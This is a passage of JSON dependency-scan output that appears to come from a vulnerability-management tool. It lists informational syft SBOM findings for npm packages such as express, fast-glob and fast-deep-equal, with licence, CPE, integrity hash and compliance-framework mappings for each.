"T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "8f3c29afa2938d65", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: events 3.3.0", "title": "events 3.3.0", "description": "Package discovered: events 3.3.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "bca3d6fcf9ecc55d", "name": "events", "version": "3.3.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:events:events:3.3.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/events@3.3.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/events/-/events-3.3.0.tgz", "integrity": "sha512-mQw+2fkQbALzQ7V0MY0IqdnXNOeTtP4r0lN9z7AAawCXgqea7bDii20AYrIBrFd/Hx0M2Ocz6S111CaFkUcb0Q==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "42a06b319afe7e6e", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: express 4.22.1", "title": "express 4.22.1", "description": "Package discovered: express 4.22.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "7bcabe4027921ced", "name": "express", "version": "4.22.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:openjsf:express:4.22.1:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/express@4.22.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/express/-/express-4.22.1.tgz", "integrity": "sha512-F2X8g9P1X7uCPZMA3MVf9wcTqlyNp7IhH5qPCI0izhaOIYXaW9L535tGA3qmjRzpH+bZczqq7hVKxTR4NWnu+g==", "dependencies": { "accepts": "~1.3.8", "array-flatten": "1.1.1", "body-parser": "~1.20.3", "content-disposition": "~0.5.4", "content-type": "~1.0.4", "cookie": "~0.7.1", "cookie-signature": "~1.0.6", "debug": "2.6.9", "depd": "2.0.0", "encodeurl": "~2.0.0", "escape-html": "~1.0.3", "etag": "~1.8.1", "finalhandler": "~1.3.1", "fresh": "~0.5.2", "http-errors": "~2.0.0", "merge-descriptors": "1.0.3", "methods": "~1.1.2", "on-finished": "~2.4.1", "parseurl": "~1.3.3", "path-to-regexp": "~0.1.12", "proxy-addr": "~2.0.7", "qs": "~6.14.0", "range-parser": "~1.2.1", "safe-buffer": "5.2.1", "send": "~0.19.0", "serve-static": "~1.16.2", "setprototypeof": "1.2.0", "statuses": "~2.0.1", "type-is": "~1.6.18", "utils-merge": "1.0.1", "vary": "~1.1.2" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "ba97090edfd08e19", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: express-rate-limit 8.5.1", "title": "express-rate-limit 8.5.1", "description": "Package discovered: express-rate-limit 8.5.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "41f99f3613a4245b", "name": "express-rate-limit", "version": "8.5.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:express-rate-limit:express-rate-limit:8.5.1:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/express-rate-limit@8.5.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/express-rate-limit/-/express-rate-limit-8.5.1.tgz", "integrity": "sha512-5O6KYmyJEpuPJV5hNTXKbAHWRqrzyu+OI3vUnSd2kXFubIVpG7ezpgxQy76Zo5GQZtrQBg86hF+CM/NX+cioiQ==", "dependencies": { "ip-address": "^10.2.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f780fc7a8f12c92d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: extend 3.0.2", "title": "extend 3.0.2", "description": "Package discovered: extend 3.0.2", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "c7f94791a09e5a4e", "name": "extend", "version": "3.0.2", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:extend_project:extend:3.0.2:*:*:*:*:node.js:*:*", "source": "nvd-cpe-dictionary" } ], "purl": "pkg:npm/extend@3.0.2", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/extend/-/extend-3.0.2.tgz", "integrity": "sha512-fjquC59cD7CyW6urNXK0FBufkZcoiGG80wTuPujX590cB5Ttln20E2UB4S/WARVqhXffZl2LNgS+gQdPIIim/g==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "9507c5e5a8d55fc3", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: farmhash-modern 1.1.0", "title": "farmhash-modern 1.1.0", "description": "Package discovered: farmhash-modern 1.1.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "2efb607597053214", "name": "farmhash-modern", "version": "1.1.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:farmhash-modern:farmhash-modern:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:farmhash-modern:farmhash_modern:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:farmhash_modern:farmhash-modern:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:farmhash_modern:farmhash_modern:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:farmhash:farmhash-modern:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:farmhash:farmhash_modern:1.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/farmhash-modern@1.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/farmhash-modern/-/farmhash-modern-1.1.0.tgz", "integrity": "sha512-6ypT4XfgqJk/F3Yuv4SX26I3doUjt0GTG4a+JgWxXQpxXzTBq8fPUeGHfcYMMDPHJHm3yPOSjaeBwBGAHWXCdA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "7b51b4692c5fdf0a", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: fast-deep-equal 2.0.1", "title": "fast-deep-equal 2.0.1", "description": "Package discovered: fast-deep-equal 2.0.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "18c3431d6798a7cd", "name": "fast-deep-equal", "version": "2.0.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:fast-deep-equal:fast-deep-equal:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast-deep-equal:fast_deep_equal:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast_deep_equal:fast-deep-equal:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast_deep_equal:fast_deep_equal:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast-deep:fast-deep-equal:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast-deep:fast_deep_equal:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast_deep:fast-deep-equal:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast_deep:fast_deep_equal:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast:fast-deep-equal:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast:fast_deep_equal:2.0.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/fast-deep-equal@2.0.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-2.0.1.tgz", "integrity": "sha512-bCK/2Z4zLidyB4ReuIsvALH6w31YfAQDmXMqMx6FyfHqvBxtjC0eRumeSu4Bs3XtXwpyIywtSTrVT99BxY1f9w==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "df8671df2c12ad48", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: fast-deep-equal 3.1.3", "title": "fast-deep-equal 3.1.3", "description": "Package discovered: fast-deep-equal 3.1.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "5dcd27213b9411fd", "name": "fast-deep-equal", "version": "3.1.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:fast-deep-equal:fast-deep-equal:3.1.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast-deep-equal:fast_deep_equal:3.1.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast_deep_equal:fast-deep-equal:3.1.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast_deep_equal:fast_deep_equal:3.1.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast-deep:fast-deep-equal:3.1.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast-deep:fast_deep_equal:3.1.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast_deep:fast-deep-equal:3.1.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast_deep:fast_deep_equal:3.1.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast:fast-deep-equal:3.1.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast:fast_deep_equal:3.1.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/fast-deep-equal@3.1.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/fast-deep-equal/-/fast-deep-equal-3.1.3.tgz", "integrity": "sha512-f3qQ9oQy9j2AhBe/H9VC91wLmKBCCU/gDOnKNAYG5hswO7BLKj09Hc5HYNz9cGI++xlpDCIgDaitVs03ATR84Q==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "f137c47d21c65abc", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: fast-equals 5.4.0", "title": "fast-equals 5.4.0", "description": "Package discovered: fast-equals 5.4.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "fea7469744f21377", "name": "fast-equals", "version": "5.4.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:fast-equals:fast-equals:5.4.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast-equals:fast_equals:5.4.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast_equals:fast-equals:5.4.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast_equals:fast_equals:5.4.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast:fast-equals:5.4.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast:fast_equals:5.4.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/fast-equals@5.4.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/fast-equals/-/fast-equals-5.4.0.tgz", "integrity": "sha512-jt2DW/aNFNwke7AUd+Z+e6pz39KO5rzdbbFCg2sGafS4mk13MI7Z8O5z9cADNn5lhGODIgLwug6TZO2ctf7kcw==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "c3d9f6c04405728e", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: fast-glob 3.3.3", "title": "fast-glob 3.3.3", "description": "Package discovered: fast-glob 3.3.3", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "756085ffd4026f3c", "name": "fast-glob", "version": "3.3.3", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:fast-glob:fast-glob:3.3.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast-glob:fast_glob:3.3.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast_glob:fast-glob:3.3.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast_glob:fast_glob:3.3.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast:fast-glob:3.3.3:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:fast:fast_glob:3.3.3:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/fast-glob@3.3.3", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/fast-glob/-/fast-glob-3.3.3.tgz", "integrity": "sha512-7MptL8U0cqcFdzIzwOTHoilX9x5BrNqye7Z/LuC7kCMRio1EMSyqRK3BEAUD7sXRq4iT4AzTVuZdhgQ2TCvYLg==", "dependencies": { "@nodelib/fs.stat": "^2.0.2", "@nodelib/fs.walk": "^1.2.3", "glob-parent": "^5.1.2", "merge2": "^1.3.0", "micromatch": "^4.0.8" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": 